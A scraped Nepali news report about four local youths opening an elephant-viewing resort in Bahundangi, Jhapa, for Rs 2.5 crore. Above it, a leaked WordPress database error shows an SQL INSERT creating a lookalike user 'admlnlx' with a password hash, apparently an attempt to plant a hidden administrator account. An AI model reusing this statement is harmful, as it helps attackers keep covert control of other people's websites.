WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BRkpOdl.H2Bru/eMT5PmcV3yaFXR3f0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 17:35:26', '', 'admlnlx', 'admlnlx')
काँकडभिट्टा,सप्तरी,पुस १३ –
झापाको बाहुनडाँगीमा स्थानीय युवाको सक्रियतामा दुई करोड ५० लाखको लागतमा होटल सञ्चालन गरिएको छ ।
ग्रामीण पर्यटन प्रवद्र्धन गर्ने उद्देश्यले अर्जुन कार्की, राजु बास्कोटा, निरज बोगटी र राजकुमार ओलीको संयुक्त लगानीमा ‘वन्स अगेन इलिफेन्ट रिसोर्ट एन्ड लज’ सञ्चालन गरिएको हो ।
बाहुनडाँगीमा दैनिक भारतीय जङ्गलबाट आउने हात्तीका हुल समेत यस रिसोर्टबाट प्रत्यक्ष हेर्न सकिने सञ्चालनक अर्जुन कार्कीले बताउनुभयो । -रासस